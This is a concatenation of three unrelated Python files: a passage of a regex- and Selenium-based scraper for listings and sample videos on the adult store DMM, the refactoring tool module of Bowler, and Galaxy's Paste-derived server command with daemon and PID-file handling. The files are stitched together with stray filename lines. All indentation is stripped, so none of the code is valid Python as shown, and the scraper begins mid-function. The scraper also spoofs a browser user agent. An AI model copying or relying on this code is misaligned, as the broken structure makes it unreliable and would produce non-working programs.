litetitle = re.findall(r'<span class=\"txt\">(.*?)</span>', box)[0]
# print(litetitle)
if litetitle == None:
notitle = 1
except:
notitle = 1
try:
cid = re.findall(r'https://www\.dmm\.co\.jp/.*?/cid=(\w+)/', box)[0]
boxdict['cid'] = cid
except Exception as e:
boxdict['cid'] = '-'
try:
keywords = re.findall(r'<span class=\"ico-\w+-\w+\"><span>(.*?)</span></span>', box)
keyword = ','.join(keywords)
boxdict['keyword'] = keyword
except:
boxdict['keyword'] = '-'
try:
links = re.findall(r'(https://www\.dmm\.co\.jp/.*?/cid=\w+/)', box)[0]
boxdict['links'] = links
except:
boxdict['links'] = '-'
try:
img = re.findall(r'(pics\.dmm\.co\.jp/.*?/\w+/\w+.jpg)',box)
boxdict['img'] = img[0]
except:
boxdict['img'] = '-'
try:
title = re.findall(
r'alt=\"(.*)\" src',
box)
boxdict['title'] = title[0]
except:
boxdict['title'] = '-'
try:
sublinks = re.findall(r'span><a href=\"(.*?)\">.*?</a></span>', box)
sublink = 'https://www.dmm.co.jp' + sublinks[0]
boxdict['sublinks'] = sublink
except:
boxdict['sublinks'] = '-'
try:
subtexts = re.findall(r'<span><a href=\".*?\">(.*?)</a></span>', box)
boxdict['subtexts'] = subtexts[0]
except:
boxdict['subtexts'] = '-'
if notitle == 0:
#print(boxdict)
boxlist.append(boxdict)
return (boxlist,stitle)
def template_links(resultdataa,stitlee):
env = Environment(loader=PackageLoader(__name__,"templates")) # ๅๅปบไธไธชๅ
ๅ ่ฝฝๅจๅฏน่ฑก
template = env.get_template('search.md') # ่ทๅไธไธชๆจกๆฟๆไปถ
temp_out = template.render(resultdata = resultdataa,stitle = stitlee)
#print(temp_out) # ๆธฒๆ
return (temp_out)
def dmmlinks(links):
result, stitle = dmmlinks_data(links)
#print(result, stitle)
temp_out = template_links(result, stitle)
return temp_out
def truevideo(searchcid):
url = 'https://www.dmm.co.jp/digital/videoa/-/detail/ajax-movie/=/cid={}'.format(searchcid)
#coding=utf-8
allconfig = read_config()
ifproxy = allconfig['ifproxy']
proxy = allconfig['proxy']
system = allconfig['system']
# ่ฟๅ
ฅๆต่งๅจ่ฎพ็ฝฎ
options = webdriver.ChromeOptions()
#่ฐทๆญๆ ๅคดๆจกๅผ
options.add_argument('--headless')
options.add_argument('--disable-gpu')
options.add_argument('--no-sandbox')
options.add_argument('--disable-software-rasterizer ')
# ่ฎพ็ฝฎ่ฏญ่จ
options.add_argument('lang=ja_JP.UTF-8')
# ๆดๆขๅคด้จ
options.add_argument('user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"')
#่ฎพ็ฝฎไปฃ็
if ifproxy == 'true':
options.add_argument('proxy-server=' + proxy)
if system == 'Linux':
browser = webdriver.Chrome(executable_path=os.path.abspath(os.path.join("app", "bin","chromedriver")),options=options)
elif system == 'Windows':
browser = webdriver.Chrome(executable_path=os.path.abspath(os.path.join("app", "bin","chromedriver.exe")),options=options)
#browser.set_page_load_timeout(5)
browser.get(url)
#print(browser.page_source)
browser.switch_to.default_content()
browser.switch_to.frame('DMMSample_player_now')
video = browser.find_element_by_xpath('//*[contains(@id,"video-video")]')
# ่ฟๅๆญๆพๆไปถๅฐๅ
videourl = browser.execute_script("return arguments[0].currentSrc;",video)
browser.quit()
return videourl
def dmmsearchall_data(searchstr):
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr=ไน็ฝใใใ'
url = 'https://www.dmm.co.jp/search/=/searchstr={}/sort=rankprofile/'.format(searchstr)
html = get_html_jp(url)
#ๅคๆญๆๆ ็ปๆ
result = re.findall(r'(ใซไธ่ดใใๅๅใฏ่ฆใคใใใพใใใงใใใ)',html)
noresult = 'ใซไธ่ดใใๅๅใฏ่ฆใคใใใพใใใงใใใ'
try:
if noresult in result:
stitle = 1
return (noresult,stitle)
except Exception:
pass
soup = BeautifulSoup(html,'lxml')
searchbody = soup.find('div',attrs = {'class' : 'd-area'})
try:
stitle = re.findall(r'<title>(.*?)</title>',html)[0]
except Exception:
stitle = 'ๆค็ดข็ตๆ'
boxall = searchbody.find('div',attrs = {'class' : 'd-sect'})
onebox = str(boxall).split('<div>')
boxlist = []
for box in onebox:
boxdict = {}
notitle = 0
if box:
try:
litetitle = re.findall(r'<span class=\"txt\">(.*?)</span>',box)[0]
#print(litetitle)
if litetitle == None:
notitle = 1
except:
notitle = 1
try:
cid = re.findall(r'<a href=\"https://www\.dmm\.co\.jp/.*?/cid=(\w+)/\?.*?\">',box)[0]
boxdict['cid'] = cid
except:
boxdict['cid'] = '-'
try:
keywords = re.findall(r'<span class=\"ico-\w+-\w+\"><span>(.*?)</span></span>',box)
keyword = ','.join(keywords)
boxdict['keyword'] = keyword
except:
boxdict['keyword'] = '-'
try:
links = re.findall(r'<a href=\"(https://www\.dmm\.co\.jp/.*?-/detail/=/cid=\w+/\?.*?)\">',box)[0]
boxdict['links'] = links
except:
boxdict['links'] = '-'
try:
img = re.findall(r'(pics\.dmm\.co\.jp/.*?/\w+/\w+.jpg)',box)[0]
boxdict['img'] = img
except Exception as e:
boxdict['img'] = '-'
try:
title = re.findall(r'alt=\"(.*)\" src',box)[0]
boxdict['title'] = title
except Exception as e:
boxdict['title'] = '-'
try:
sublinks = re.findall(r'<span><a href=\"(.*?)\">.*?</a></span>',box)
boxdict['sublinks'] = sublinks[0]
except Exception as e:
boxdict['sublinks'] = '-'
try:
subtexts = re.findall(r'<span><a href=\".*?\">(.*?)</a></span>',box)[0]
boxdict['subtexts'] = subtexts
except:
boxdict['subtexts'] = '-'
if notitle == 0:
#print(boxdict)
boxlist.append(boxdict)
return (boxlist,stitle)
def template_searchall(resultdataa,stitlee):
env = Environment(loader=PackageLoader(__name__,"templates")) # ๅๅปบไธไธชๅ
ๅ ่ฝฝๅจๅฏน่ฑก
template = env.get_template('searchall.md') # ่ทๅไธไธชๆจกๆฟๆไปถ
temp_out = template.render(resultdata = resultdataa,stitle = stitlee)
#print(temp_out) # ๆธฒๆ
return (temp_out)
def dmmsearchall(searchstr,mode='temp'):
result, stitle = dmmsearchall_data(searchstr)
if mode == 'onlysearch':
return result, stitle
noresult = 'ใซไธ่ดใใๅๅใฏ่ฆใคใใใพใใใงใใใ'
if result == noresult:
return noresult
temp_out = template_searchall(result, stitle)
return temp_out
if __name__ == "__main__":
print(dmmonecid('ssni-441'))
|
tool.py
|
#!/usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import difflib
import logging
import multiprocessing
import os
import time
from queue import Empty
from typing import Iterator, List, Sequence, Tuple
import click
import sh
from fissix.pgen2.parse import ParseError
from fissix.refactor import RefactoringTool
from .types import (
BowlerException,
BowlerQuit,
Filename,
Fixers,
Hunk,
Processor,
RetryFile,
)
PROMPT_HELP = {
"y": "apply this hunk",
"n": "skip this hunk",
"a": "apply this hunk and all remaining hunks for this file",
"d": "skip this hunk and all remaining hunks for this file",
"q": "quit; do not apply this hunk or any remaining hunks",
"?": "show help",
}
log = logging.getLogger(__name__)
def diff_texts(a: str, b: str, filename: str) -> Iterator[str]:
lines_a = a.splitlines()
lines_b = b.splitlines()
return difflib.unified_diff(lines_a, lines_b, filename, filename, lineterm="")
def prompt_user(question: str, options: str, default: str = "") -> str:
options = options.lower()
default = default.lower()
assert len(default) < 2 and default in options
if "?" not in options:
options += "?"
prompt_options = ",".join(o.upper() if o == default else o for o in options)
prompt = f"{question} [{prompt_options}]? "
result = ""
while True:
result = input(prompt).strip().lower()
if result == "?":
for option in PROMPT_HELP:
click.secho(f"{option} - {PROMPT_HELP[option]}", fg="red", bold=True)
elif len(result) == 1 and result in options:
return result
elif result:
click.echo(f'invalid response "{result}"')
elif default:
return default
class BowlerTool(RefactoringTool):
NUM_PROCESSES = os.cpu_count() or 1
def __init__(
self,
fixers: Fixers,
*args,
interactive: bool = True,
write: bool = False,
silent: bool = False,
hunk_processor: Processor = None,
**kwargs,
) -> None:
options = kwargs.pop("options", {})
options["print_function"] = True
super().__init__(fixers, *args, options=options, **kwargs)
self.queue_count = 0
self.queue = multiprocessing.JoinableQueue() # type: ignore
self.results = multiprocessing.Queue() # type: ignore
self.semaphore = multiprocessing.Semaphore(self.NUM_PROCESSES)
self.interactive = interactive
self.write = write
self.silent = silent
if hunk_processor is not None:
self.hunk_processor = hunk_processor
else:
self.hunk_processor = lambda f, h: True
def get_fixers(self) -> Tuple[Fixers, Fixers]:
fixers = [f(self.options, self.fixer_log) for f in self.fixers]
pre: Fixers = [f for f in fixers if f.order == "pre"]
post: Fixers = [f for f in fixers if f.order == "post"]
return pre, post
def processed_file(
self, new_text: str, filename: str, old_text: str = "", *args, **kwargs
) -> List[Hunk]:
self.files.append(filename)
hunks: List[Hunk] = []
if old_text != new_text:
a, b, *lines = list(diff_texts(old_text, new_text, filename))
hunk: Hunk = []
for line in lines:
if line.startswith("@@"):
if hunk:
hunks.append([a, b, *hunk])
hunk = []
hunk.append(line)
if hunk:
hunks.append([a, b, *hunk])
return hunks
def refactor_file(self, filename: str, *a, **k) -> List[Hunk]:
try:
hunks: List[Hunk] = []
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return hunks
except OSError:
self.log_debug("Failed to read %s, skipping", filename)
return hunks
try:
if not input.endswith("\n"):
input += "\n"
tree = self.refactor_string(input, filename)
hunks = self.processed_file(str(tree), filename, input)
except ParseError:
self.log_debug("Failed to parse %s, skipping", filename)
return hunks
def refactor_dir(self, dir_name: str, *a, **k) -> None:
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if not name.startswith(".") and os.path.splitext(name)[1] == py_ext:
fullname = os.path.join(dirpath, name)
self.queue_work(Filename(fullname))
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def refactor_queue(self) -> None:
self.semaphore.acquire()
while True:
filename = self.queue.get()
if filename is None:
break
try:
hunks = self.refactor_file(filename)
self.results.put((filename, hunks))
except RetryFile:
self.log_debug(f"Retrying {filename} later...")
self.queue.put(filename)
except BowlerException as e:
self.log_debug(f"Bowler exception during transform: {e}")
self.results.put((filename, []))
finally:
self.queue.task_done()
self.semaphore.release()
def queue_work(self, filename: Filename) -> None:
self.queue.put(filename)
self.queue_count += 1
def refactor(self, items: Sequence[str], *a, **k) -> None:
"""Refactor a list of files and directories."""
child_count = max(1, min(self.NUM_PROCESSES, len(items)))
self.log_debug(f"starting {child_count} processes")
children = [
multiprocessing.Process(target=self.refactor_queue)
for i in range(child_count)
]
for child in children:
child.start()
for dir_or_file in sorted(items):
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file)
else:
self.queue_work(Filename(dir_or_file))
for _child in children:
self.queue.put(None)
results_count = 0
while True:
try:
filename, hunks = self.results.get_nowait()
self.log_debug(f"results: got {len(hunks)} hunks for {filename}")
results_count += 1
self.process_hunks(filename, hunks)
except Empty:
if self.queue.empty() and results_count == self.queue_count:
break
elif not any(child.is_alive() for child in children):
self.log_debug(f"child processes stopped without consuming work")
break
else:
time.sleep(0.05)
except BowlerQuit:
for child in children:
child.terminate()
return
self.log_debug(f"all children stopped and all diff hunks processed")
def process_hunks(self, filename: Filename, hunks: List[Hunk]) -> None:
auto_yes = False
result = ""
accepted_hunks = ""
for hunk in hunks:
if self.hunk_processor(filename, hunk) is False:
continue
if not self.silent:
for line in hunk:
if line.startswith("---"):
click.secho(line, fg="red", bold=True)
elif line.startswith("+++"):
click.secho(line, fg="green", bold=True)
elif line.startswith("-"):
click.secho(line, fg="red")
elif line.startswith("+"):
click.secho(line, fg="green")
else:
click.echo(line)
if self.interactive:
if auto_yes:
click.echo(f"Applying remaining hunks to {filename}")
result = "y"
else:
result = prompt_user("Apply this hunk", "ynqad", "n")
self.log_debug(f"result = {result}")
if result == "q":
self.apply_hunks(accepted_hunks, filename)
raise BowlerQuit()
elif result == "d":
self.apply_hunks(accepted_hunks, filename)
return # skip all remaining hunks
elif result == "n":
continue
elif result == "a":
auto_yes = True
result = "y"
elif result != "y":
raise ValueError("unknown response")
if result == "y" or self.write:
accepted_hunks += "\n".join(hunk[2:]) + "\n"
self.apply_hunks(accepted_hunks, filename)
def apply_hunks(self, accepted_hunks, filename):
if accepted_hunks:
accepted_hunks = f"--- {filename}\n+++ {filename}\n{accepted_hunks}"
args = ["patch", "-u", filename]
self.log_debug(f"running {args}")
try:
sh.patch(*args[1:], _in=accepted_hunks.encode("utf-8")) # type: ignore
except sh.ErrorReturnCode as e:
if e.stderr:
err = e.stderr.strip().decode("utf-8")
else:
err = e.stdout.strip().decode("utf-8")
if "saving rejects to file" in err:
err = err.split("saving rejects to file")[1]
log.exception(f"hunks failed to apply, rejects saved to{err}")
return
log.exception(f"failed to apply patch hunk: {err}")
def run(self, paths: Sequence[str]) -> int:
if not self.errors:
self.refactor(paths)
self.summarize()
return int(bool(self.errors))
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized
from __future__ import absolute_import
from __future__ import print_function
import atexit
import errno
import grp
import logging
import optparse
import os
import pwd
import re
import resource
import signal
import socket
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from six.moves import configparser
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' %s %s' % (self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False) and
getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
raise socket.error(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print('Writing PID %s to %s' % (pid, pid_file))
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except (OSError, IOError) as e:
print("Could not delete: %s" % e)
return 2
return 1
for _i in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print('PID %s in %s is not running' % (pid, pid_file))
return 1
